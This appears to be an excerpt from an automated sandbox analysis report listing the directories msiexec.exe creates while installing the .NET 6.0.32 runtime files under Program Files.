                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Memory.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.deps.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.ZipFile.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\ucrtbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-debug-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.OpenSsl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.Client.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Timer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Algorithms.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-util-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Immutable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebClient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.HttpUtility.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-profile-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TextWriterTraceListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.RegularExpressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.Vectors.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Dynamic.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.runtimeconfig.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.Unsafe.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dllJump to behavior
